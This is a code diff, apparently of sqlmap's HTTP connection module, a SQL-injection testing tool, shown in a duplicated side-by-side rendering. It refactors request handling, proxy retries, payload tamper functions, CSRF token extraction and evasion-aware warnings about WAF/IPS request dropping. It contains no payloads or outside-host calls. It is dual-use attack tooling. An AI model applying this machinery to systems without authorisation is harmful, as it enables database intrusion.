response = kwargs.get("response", False)
|
||||||
ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts
|
ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts
|
||||||
refreshing = kwargs.get("refreshing", False)
|
refreshing = kwargs.get("refreshing", False)
|
||||||
retrying = kwargs.get("retrying", False)
|
retrying = kwargs.get("retrying", False)
|
||||||
crawling = kwargs.get("crawling", False)
|
crawling = kwargs.get("crawling", False)
|
||||||
checking = kwargs.get("checking", False)
|
checking = kwargs.get("checking", False)
|
||||||
skipRead = kwargs.get("skipRead", False)
|
skipRead = kwargs.get("skipRead", False)
|
||||||
|
|
||||||
if multipart:
|
if multipart:
|
||||||
post = multipart
|
post = multipart
|
||||||
@@ -317,8 +319,8 @@ class Connect(object):
|
|||||||
|
|
||||||
elif target:
|
elif target:
|
||||||
if conf.forceSSL and urlparse.urlparse(url).scheme != "https":
|
if conf.forceSSL and urlparse.urlparse(url).scheme != "https":
|
||||||
url = re.sub("(?i)\Ahttp:", "https:", url)
|
url = re.sub(r"(?i)\Ahttp:", "https:", url)
|
||||||
url = re.sub("(?i):80/", ":443/", url)
|
url = re.sub(r"(?i):80/", ":443/", url)
|
||||||
|
|
||||||
if PLACE.GET in conf.parameters and not get:
|
if PLACE.GET in conf.parameters and not get:
|
||||||
get = conf.parameters[PLACE.GET]
|
get = conf.parameters[PLACE.GET]
|
||||||
@@ -344,7 +346,7 @@ class Connect(object):
|
|||||||
requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
|
requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
|
||||||
|
|
||||||
# Prepare HTTP headers
|
# Prepare HTTP headers
|
||||||
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host})
|
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}, base=None if target else {})
|
||||||
|
|
||||||
if HTTP_HEADER.COOKIE in headers:
|
if HTTP_HEADER.COOKIE in headers:
|
||||||
cookie = headers[HTTP_HEADER.COOKIE]
|
cookie = headers[HTTP_HEADER.COOKIE]
|
||||||
@@ -384,11 +386,7 @@ class Connect(object):
|
|||||||
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie})
|
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie})
|
||||||
|
|
||||||
if auxHeaders:
|
if auxHeaders:
|
||||||
for key, value in auxHeaders.items():
|
headers = forgeHeaders(auxHeaders, headers)
|
||||||
for _ in headers.keys():
|
|
||||||
if _.upper() == key.upper():
|
|
||||||
del headers[_]
|
|
||||||
headers[key] = value
|
|
||||||
|
|
||||||
for key, value in headers.items():
|
for key, value in headers.items():
|
||||||
del headers[key]
|
del headers[key]
|
||||||
@@ -409,8 +407,10 @@ class Connect(object):
|
|||||||
ws.close()
|
ws.close()
|
||||||
code = ws.status
|
code = ws.status
|
||||||
status = httplib.responses[code]
|
status = httplib.responses[code]
|
||||||
|
|
||||||
class _(dict):
|
class _(dict):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
responseHeaders = _(ws.getheaders())
|
responseHeaders = _(ws.getheaders())
|
||||||
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
|
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
|
||||||
|
|
||||||
@@ -430,8 +430,10 @@ class Connect(object):
|
|||||||
method = unicodeencode(method)
|
method = unicodeencode(method)
|
||||||
req = MethodRequest(url, post, headers)
|
req = MethodRequest(url, post, headers)
|
||||||
req.set_method(method)
|
req.set_method(method)
|
||||||
else:
|
elif url is not None:
|
||||||
req = urllib2.Request(url, post, headers)
|
req = urllib2.Request(url, post, headers)
|
||||||
|
else:
|
||||||
|
return None, None, None
|
||||||
|
|
||||||
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
|
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
|
||||||
|
|
||||||
@@ -481,8 +483,7 @@ class Connect(object):
|
|||||||
|
|
||||||
# Get HTTP response
|
# Get HTTP response
|
||||||
if hasattr(conn, "redurl"):
|
if hasattr(conn, "redurl"):
|
||||||
page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
|
page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None
|
||||||
else Connect._connReadProxy(conn)) if not skipRead else None
|
|
||||||
skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
|
skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
|
||||||
code = conn.redcode
|
code = conn.redcode
|
||||||
else:
|
else:
|
||||||
@@ -497,7 +498,7 @@ class Connect(object):
|
|||||||
responseHeaders = {}
|
responseHeaders = {}
|
||||||
|
|
||||||
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
|
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
|
||||||
status = getUnicode(conn.msg) if conn else None
|
status = getUnicode(conn.msg) if conn and getattr(conn, "msg", None) else None
|
||||||
|
|
||||||
kb.connErrorCounter = 0
|
kb.connErrorCounter = 0
|
||||||
|
|
||||||
@@ -546,6 +547,15 @@ class Connect(object):
|
|||||||
warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex)
|
warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
except SqlmapConnectionException, ex:
|
||||||
|
if conf.proxyList and not kb.threadException:
|
||||||
|
warnMsg = "unable to connect to the target URL ('%s')" % ex
|
||||||
|
logger.critical(warnMsg)
|
||||||
|
threadData.retriesCount = conf.retries
|
||||||
|
return Connect._retryProxy(**kwargs)
|
||||||
|
else:
|
||||||
|
raise
|
||||||
|
|
||||||
except urllib2.HTTPError, ex:
|
except urllib2.HTTPError, ex:
|
||||||
page = None
|
page = None
|
||||||
responseHeaders = None
|
responseHeaders = None
|
||||||
@@ -571,7 +581,7 @@ class Connect(object):
|
|||||||
page = page if isinstance(page, unicode) else getUnicode(page)
|
page = page if isinstance(page, unicode) else getUnicode(page)
|
||||||
|
|
||||||
code = ex.code
|
code = ex.code
|
||||||
status = getUnicode(ex.msg)
|
status = getSafeExString(ex)
|
||||||
|
|
||||||
kb.originalCode = kb.originalCode or code
|
kb.originalCode = kb.originalCode or code
|
||||||
threadData.lastHTTPError = (threadData.lastRequestUID, code, status)
|
threadData.lastHTTPError = (threadData.lastRequestUID, code, status)
|
||||||
@@ -594,34 +604,35 @@ class Connect(object):
|
|||||||
if not multipart:
|
if not multipart:
|
||||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
||||||
|
|
||||||
if ex.code == httplib.UNAUTHORIZED and not conf.ignore401:
|
if ex.code != conf.ignoreCode:
|
||||||
errMsg = "not authorized, try to provide right HTTP "
|
if ex.code == httplib.UNAUTHORIZED:
|
||||||
errMsg += "authentication type and valid credentials (%d)" % code
|
errMsg = "not authorized, try to provide right HTTP "
|
||||||
raise SqlmapConnectionException(errMsg)
|
errMsg += "authentication type and valid credentials (%d)" % code
|
||||||
elif ex.code == httplib.NOT_FOUND:
|
|
||||||
if raise404:
|
|
||||||
errMsg = "page not found (%d)" % code
|
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
else:
|
elif ex.code == httplib.NOT_FOUND:
|
||||||
debugMsg = "page not found (%d)" % code
|
if raise404:
|
||||||
singleTimeLogMessage(debugMsg, logging.DEBUG)
|
errMsg = "page not found (%d)" % code
|
||||||
elif ex.code == httplib.GATEWAY_TIMEOUT:
|
raise SqlmapConnectionException(errMsg)
|
||||||
if ignoreTimeout:
|
|
||||||
return None if not conf.ignoreTimeouts else "", None, None
|
|
||||||
else:
|
|
||||||
warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code])
|
|
||||||
if threadData.retriesCount < conf.retries and not kb.threadException:
|
|
||||||
warnMsg += ". sqlmap is going to retry the request"
|
|
||||||
logger.critical(warnMsg)
|
|
||||||
return Connect._retryProxy(**kwargs)
|
|
||||||
elif kb.testMode:
|
|
||||||
logger.critical(warnMsg)
|
|
||||||
return None, None, None
|
|
||||||
else:
|
else:
|
||||||
raise SqlmapConnectionException(warnMsg)
|
debugMsg = "page not found (%d)" % code
|
||||||
else:
|
singleTimeLogMessage(debugMsg, logging.DEBUG)
|
||||||
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
elif ex.code == httplib.GATEWAY_TIMEOUT:
|
||||||
logger.debug(debugMsg)
|
if ignoreTimeout:
|
||||||
|
return None if not conf.ignoreTimeouts else "", None, None
|
||||||
|
else:
|
||||||
|
warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code])
|
||||||
|
if threadData.retriesCount < conf.retries and not kb.threadException:
|
||||||
|
warnMsg += ". sqlmap is going to retry the request"
|
||||||
|
logger.critical(warnMsg)
|
||||||
|
return Connect._retryProxy(**kwargs)
|
||||||
|
elif kb.testMode:
|
||||||
|
logger.critical(warnMsg)
|
||||||
|
return None, None, None
|
||||||
|
else:
|
||||||
|
raise SqlmapConnectionException(warnMsg)
|
||||||
|
else:
|
||||||
|
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError):
|
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError):
|
||||||
tbMsg = traceback.format_exc()
|
tbMsg = traceback.format_exc()
|
||||||
@@ -634,13 +645,6 @@ class Connect(object):
|
|||||||
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
|
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
|
||||||
warnMsg = "connection was forcibly closed by the target URL"
|
warnMsg = "connection was forcibly closed by the target URL"
|
||||||
elif "timed out" in tbMsg:
|
elif "timed out" in tbMsg:
|
||||||
if not conf.disablePrecon:
|
|
||||||
singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
|
|
||||||
conf.disablePrecon = True
|
|
||||||
|
|
||||||
if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
|
||||||
kb.responseTimes.clear()
|
|
||||||
|
|
||||||
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
||||||
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests")
|
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests")
|
||||||
kb.droppingRequests = True
|
kb.droppingRequests = True
|
||||||
@@ -673,9 +677,12 @@ class Connect(object):
|
|||||||
warnMsg = "there was an incomplete read error while retrieving data "
|
warnMsg = "there was an incomplete read error while retrieving data "
|
||||||
warnMsg += "from the target URL"
|
warnMsg += "from the target URL"
|
||||||
elif "Handshake status" in tbMsg:
|
elif "Handshake status" in tbMsg:
|
||||||
status = re.search("Handshake status ([\d]{3})", tbMsg)
|
status = re.search(r"Handshake status ([\d]{3})", tbMsg)
|
||||||
errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
|
errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
elif "SqlmapCompressionException" in tbMsg:
|
||||||
|
warnMsg = "problems with response (de)compression"
|
||||||
|
retrying = True
|
||||||
else:
|
else:
|
||||||
warnMsg = "unable to connect to the target URL"
|
warnMsg = "unable to connect to the target URL"
|
||||||
|
|
||||||
@@ -711,7 +718,7 @@ class Connect(object):
|
|||||||
else:
|
else:
|
||||||
logger.debug(warnMsg)
|
logger.debug(warnMsg)
|
||||||
return Connect._retryProxy(**kwargs)
|
return Connect._retryProxy(**kwargs)
|
||||||
elif kb.testMode:
|
elif kb.testMode or kb.multiThreadMode:
|
||||||
logger.critical(warnMsg)
|
logger.critical(warnMsg)
|
||||||
return None, None, None
|
return None, None, None
|
||||||
else:
|
else:
|
||||||
@@ -730,12 +737,12 @@ class Connect(object):
|
|||||||
if conn and getattr(conn, "redurl", None):
|
if conn and getattr(conn, "redurl", None):
|
||||||
_ = urlparse.urlsplit(conn.redurl)
|
_ = urlparse.urlsplit(conn.redurl)
|
||||||
_ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
|
_ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
|
||||||
requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1)
|
requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", r"\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1)
|
||||||
|
|
||||||
if kb.resendPostOnRedirect is False:
|
if kb.resendPostOnRedirect is False:
|
||||||
requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg)
|
requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", r"\g<1>GET ", requestMsg)
|
||||||
requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
|
requestMsg = re.sub(r"(?i)Content-length: \d+\n", "", requestMsg)
|
||||||
requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)
|
requestMsg = re.sub(r"(?s)\n\n.+", "\n", requestMsg)
|
||||||
|
|
||||||
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status)
|
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status)
|
||||||
else:
|
else:
|
||||||
@@ -758,11 +765,12 @@ class Connect(object):
|
|||||||
return page, responseHeaders, code
|
return page, responseHeaders, code
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
|
@stackedmethod
|
||||||
|
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, disableTampering=False):
|
||||||
"""
|
"""
|
||||||
This method calls a function to get the target URL page content
|
This method calls a function to get the target URL page content
|
||||||
and returns its page MD5 hash or a boolean value in case of
|
and returns its page ratio (0 <= ratio <= 1) or a boolean value
|
||||||
string match check ('--string' command line parameter)
|
representing False/True match in case of !getRatioValue
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if conf.direct:
|
if conf.direct:
|
||||||
@@ -788,6 +796,8 @@ class Connect(object):
|
|||||||
raise404 = place != PLACE.URI if raise404 is None else raise404
|
raise404 = place != PLACE.URI if raise404 is None else raise404
|
||||||
method = method or conf.method
|
method = method or conf.method
|
||||||
|
|
||||||
|
postUrlEncode = kb.postUrlEncode
|
||||||
|
|
||||||
value = agent.adjustLateValues(value)
|
value = agent.adjustLateValues(value)
|
||||||
payload = agent.extractPayload(value)
|
payload = agent.extractPayload(value)
|
||||||
threadData = getCurrentThreadData()
|
threadData = getCurrentThreadData()
|
||||||
@@ -796,14 +806,14 @@ class Connect(object):
|
|||||||
headers = OrderedDict(conf.httpHeaders)
|
headers = OrderedDict(conf.httpHeaders)
|
||||||
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
|
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
|
||||||
|
|
||||||
if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
|
if (kb.postHint or conf.skipUrlEncode) and postUrlEncode:
|
||||||
kb.postUrlEncode = False
|
postUrlEncode = False
|
||||||
conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]
|
conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]
|
||||||
contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
|
contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
|
||||||
conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))
|
conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))
|
||||||
|
|
||||||
if payload:
|
if payload:
|
||||||
if kb.tamperFunctions:
|
if not disableTampering and kb.tamperFunctions:
|
||||||
for function in kb.tamperFunctions:
|
for function in kb.tamperFunctions:
|
||||||
try:
|
try:
|
||||||
payload = function(payload=payload, headers=auxHeaders)
|
payload = function(payload=payload, headers=auxHeaders)
|
||||||
@@ -827,21 +837,15 @@ class Connect(object):
|
|||||||
# with their HTML encoded counterparts
|
# with their HTML encoded counterparts
|
||||||
payload = payload.replace('>', ">").replace('<', "<")
|
payload = payload.replace('>', ">").replace('<', "<")
|
||||||
elif kb.postHint == POST_HINT.JSON:
|
elif kb.postHint == POST_HINT.JSON:
|
||||||
if payload.startswith('"') and payload.endswith('"'):
|
payload = escapeJsonValue(payload)
|
||||||
payload = json.dumps(payload[1:-1])
|
|
||||||
else:
|
|
||||||
payload = json.dumps(payload)[1:-1]
|
|
||||||
elif kb.postHint == POST_HINT.JSON_LIKE:
|
elif kb.postHint == POST_HINT.JSON_LIKE:
|
||||||
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
||||||
if payload.startswith('"') and payload.endswith('"'):
|
payload = escapeJsonValue(payload)
|
||||||
payload = json.dumps(payload[1:-1])
|
|
||||||
else:
|
|
||||||
payload = json.dumps(payload)[1:-1]
|
|
||||||
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
||||||
value = agent.replacePayload(value, payload)
|
value = agent.replacePayload(value, payload)
|
||||||
else:
|
else:
|
||||||
# GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
|
# GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
|
||||||
if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
|
if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode:
|
||||||
skip = False
|
skip = False
|
||||||
|
|
||||||
if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE:
|
if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE:
|
||||||
@@ -852,8 +856,11 @@ class Connect(object):
|
|||||||
skip = True
|
skip = True
|
||||||
|
|
||||||
if not skip:
|
if not skip:
|
||||||
payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below
|
if place in (PLACE.POST, PLACE.CUSTOM_POST): # potential problems in other cases (e.g. URL encoding of whole URI - including path)
|
||||||
|
value = urlencode(value, spaceplus=kb.postSpaceToPlus)
|
||||||
|
payload = urlencode(payload, safe='%', spaceplus=kb.postSpaceToPlus)
|
||||||
value = agent.replacePayload(value, payload)
|
value = agent.replacePayload(value, payload)
|
||||||
|
postUrlEncode = False
|
||||||
|
|
||||||
if conf.hpp:
|
if conf.hpp:
|
||||||
if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)):
|
if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)):
|
||||||
@@ -862,7 +869,7 @@ class Connect(object):
|
|||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
if place in (PLACE.GET, PLACE.POST):
|
if place in (PLACE.GET, PLACE.POST):
|
||||||
_ = re.escape(PAYLOAD_DELIMITER)
|
_ = re.escape(PAYLOAD_DELIMITER)
|
||||||
match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value)
|
match = re.search(r"(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value)
|
||||||
if match:
|
if match:
|
||||||
payload = match.group("value")
|
payload = match.group("value")
|
||||||
|
|
||||||
@@ -921,29 +928,31 @@ class Connect(object):
|
|||||||
|
|
||||||
if value and place == PLACE.CUSTOM_HEADER:
|
if value and place == PLACE.CUSTOM_HEADER:
|
||||||
if value.split(',')[0].capitalize() == PLACE.COOKIE:
|
if value.split(',')[0].capitalize() == PLACE.COOKIE:
|
||||||
cookie = value.split(',', 1)[1]
|
cookie = value.split(',', 1)[-1]
|
||||||
else:
|
else:
|
||||||
auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
|
auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1]
|
||||||
|
|
||||||
if conf.csrfToken:
|
if conf.csrfToken:
|
||||||
def _adjustParameter(paramString, parameter, newValue):
|
def _adjustParameter(paramString, parameter, newValue):
|
||||||
retVal = paramString
|
retVal = paramString
|
||||||
match = re.search("%s=[^&]*" % re.escape(parameter), paramString)
|
match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString)
|
||||||
if match:
|
if match:
|
||||||
retVal = re.sub(re.escape(match.group(0)), "%s=%s" % (parameter, newValue), paramString)
|
retVal = re.sub(re.escape(match.group(0)), "%s=%s" % (parameter, newValue), paramString)
|
||||||
else:
|
else:
|
||||||
match = re.search("(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString)
|
match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString)
|
||||||
if match:
|
if match:
|
||||||
retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString)
|
retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString)
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
||||||
match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
|
token = extractRegexResult(r"(?i)<input[^>]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))" % re.escape(conf.csrfToken), page or "")
|
||||||
token = (match.group(2) or match.group(3) or match.group(4)) if match else None
|
|
||||||
|
|
||||||
if not token:
|
if not token:
|
||||||
match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
|
token = extractRegexResult(r"(?i)<input[^>]+\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))[^>]+\bname=[\"']?%s[\"']?" % re.escape(conf.csrfToken), page or "")
|
||||||
token = match.group(1) if match else None
|
|
||||||
|
if not token:
|
||||||
|
match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
|
||||||
|
token = match.group(1) if match else None
|
||||||
|
|
||||||
if not token:
|
if not token:
|
||||||
if conf.csrfUrl != conf.url and code == httplib.OK:
|
if conf.csrfUrl != conf.url and code == httplib.OK:
|
||||||
@@ -968,9 +977,11 @@ class Connect(object):
|
|||||||
if not conf.csrfUrl:
|
if not conf.csrfUrl:
|
||||||
errMsg += ". You can try to rerun by providing "
|
errMsg += ". You can try to rerun by providing "
|
||||||
errMsg += "a valid value for option '--csrf-url'"
|
errMsg += "a valid value for option '--csrf-url'"
|
||||||
raise SqlmapTokenException, errMsg
|
raise SqlmapTokenException(errMsg)
|
||||||
|
|
||||||
if token:
|
if token:
|
||||||
|
token = token.strip("'\"")
|
||||||
|
|
||||||
for place in (PLACE.GET, PLACE.POST):
|
for place in (PLACE.GET, PLACE.POST):
|
||||||
if place in conf.parameters:
|
if place in conf.parameters:
|
||||||
if place == PLACE.GET and get:
|
if place == PLACE.GET and get:
|
||||||
@@ -1018,18 +1029,24 @@ class Connect(object):
|
|||||||
for part in item.split(delimiter):
|
for part in item.split(delimiter):
|
||||||
if '=' in part:
|
if '=' in part:
|
||||||
name, value = part.split('=', 1)
|
name, value = part.split('=', 1)
|
||||||
name = re.sub(r"[^\w]", "", name.strip())
|
name = name.strip()
|
||||||
if name in keywords:
|
if safeVariableNaming(name) != name:
|
||||||
|
conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode)
|
||||||
|
name = safeVariableNaming(name)
|
||||||
|
elif name in keywords:
|
||||||
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
|
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
|
||||||
value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
|
value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus))
|
||||||
variables[name] = value
|
variables[name] = value
|
||||||
|
|
||||||
if cookie:
|
if cookie:
|
||||||
for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
|
for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
|
||||||
if '=' in part:
|
if '=' in part:
|
||||||
name, value = part.split('=', 1)
|
name, value = part.split('=', 1)
|
||||||
name = re.sub(r"[^\w]", "", name.strip())
|
name = name.strip()
|
||||||
if name in keywords:
|
if safeVariableNaming(name) != name:
|
||||||
|
conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode)
|
||||||
|
name = safeVariableNaming(name)
|
||||||
|
elif name in keywords:
|
||||||
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
|
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
|
||||||
value = urldecode(value, convall=True)
|
value = urldecode(value, convall=True)
|
||||||
variables[name] = value
|
variables[name] = value
|
||||||
@@ -1040,10 +1057,18 @@ class Connect(object):
|
|||||||
except SyntaxError, ex:
|
except SyntaxError, ex:
|
||||||
if ex.text:
|
if ex.text:
|
||||||
original = replacement = ex.text.strip()
|
original = replacement = ex.text.strip()
|
||||||
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
|
if '=' in original:
|
||||||
if _ in keywords:
|
name, value = original.split('=', 1)
|
||||||
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
|
name = name.strip()
|
||||||
break
|
if safeVariableNaming(name) != name:
|
||||||
|
replacement = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), replacement)
|
||||||
|
elif name in keywords:
|
||||||
|
replacement = re.sub(r"\b%s\b" % re.escape(name), "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX), replacement)
|
||||||
|
else:
|
||||||
|
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
|
||||||
|
if _ in keywords:
|
||||||
|
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
|
||||||
|
break
|
||||||
if original == replacement:
|
if original == replacement:
|
||||||
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
|
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
|
||||||
break
|
break
|
||||||
@@ -1063,6 +1088,11 @@ class Connect(object):
|
|||||||
del variables[variable]
|
del variables[variable]
|
||||||
variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value
|
